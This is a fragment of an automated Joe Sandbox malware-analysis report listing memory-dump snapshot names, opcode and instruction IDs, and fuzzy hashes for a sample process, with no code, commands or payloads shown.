                                                                                                                  • Snapshot File: hcaresult_7_2_ab0000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID: %$&$9$<$R$T$W$b
                                                                                                                  • API String ID: 0-3780034300
                                                                                                                  • Opcode ID: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                                                  • Instruction ID: ea4eb5d447afb8c219754566056ae19e0758b7e98c96f467b9d833ad5c68e227
                                                                                                                  • Opcode Fuzzy Hash: 1461b86cfa4d3767ede56ba77eb50cf2841e928c2e72e09b72740e390ede6aa9
                                                                                                                  • Instruction Fuzzy Hash: 5D718F2250C7C28ED311867D484429BAFD25BE3634F2C8BADE5F9873D2C56AC50A9363
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2035850350.0000000003220000.00000040.00001000.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_3220000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 4627768378365624fc26f57d5dea23127f743dd20927aa4aa4d49b0f797d75e4
                                                                                                                  • Instruction ID: e271e2b8e7e1d2603c62ba1fafd522801950f1776bf3ce852d925ee8a3077951
                                                                                                                  • Opcode Fuzzy Hash: 4627768378365624fc26f57d5dea23127f743dd20927aa4aa4d49b0f797d75e4
                                                                                                                  • Instruction Fuzzy Hash: 8911B172341102FFD701AA49CD8AF697779EB99760F15802AFE0A9F689D33658118F60
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000007.00000002.2035850350.0000000003220000.00000040.00001000.00020000.00000000.sdmp, Offset: 03220000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_7_2_3220000_jyidkjkfhjawd.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: fd55ee32bc43683cf2536e5d727388cfa5947c10a7d843108b7fa1e7a6572f7d
                                                                                                                  • Instruction ID: 8a699d6b4d72db26ef47c71f667fc661ebdf4a877053d44fc7b9aca7a6ab39a5
                                                                                                                  • Opcode Fuzzy Hash: fd55ee32bc43683cf2536e5d727388cfa5947c10a7d843108b7fa1e7a6572f7d
                                                                                                                  • Instruction Fuzzy Hash: DD112972711101AFD3106F1ACD0AF567BB8EBE4750F11402AF9199F392C73998118F90